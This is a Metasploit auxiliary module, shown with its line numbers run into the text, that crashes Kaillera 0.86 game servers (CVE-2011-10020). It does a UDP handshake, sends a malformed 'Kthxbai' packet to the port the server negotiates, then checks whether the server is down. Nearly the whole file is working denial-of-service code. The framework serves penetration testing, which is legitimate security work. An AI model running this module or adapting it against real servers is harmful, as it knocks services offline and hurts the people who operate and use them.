Path: blob/master/modules/auxiliary/dos/windows/games/kaillera.rb
33244 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Udp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Kaillera 0.86 Server Denial of Service',14'Description' => %q{15The Kaillera 0.86 server can be shut down by sending any malformed packet16after the initial "hello" packet.17},18'Author' => ['Sil3nt_Dre4m'],19'License' => MSF_LICENSE,20'DisclosureDate' => '2011-07-02',21'References' => [22[ 'CVE', '2011-10020' ]23],24'Notes' => {25'Stability' => [CRASH_SERVICE_DOWN],26'SideEffects' => [],27'Reliability' => []28}29)30)3132register_options([33Opt::RPORT(27888)34])35end3637def run38# Send HELLO to target39connect_udp40print_status('Sending Crash request...')41udp_sock.put("HELLO0.83\0")42res = udp_sock.recvfrom(15)43disconnect_udp4445if res[0] =~ /HELLOD00D([0-9]{1,5})/46port = ::Regexp.last_match(1)47else48print_error('Connection failed')49return50end5152# Send DOS packet53connect_udp(true, 'RPORT' => port)54print_status("Sending DoS packet to #{rhost}:#{port}...")55udp_sock.put('Kthxbai')56disconnect_udp5758# Check is target is down59connect_udp60print_status('Checking target...')61udp_sock.put("HELLO0.83\0")62res = udp_sock.recvfrom(15)63disconnect_udp6465if res[0] =~ /HELLO/66print_error('DoS attempt failed. It appears target is still up.')67else68print_good('Target is down')69end70end71end727374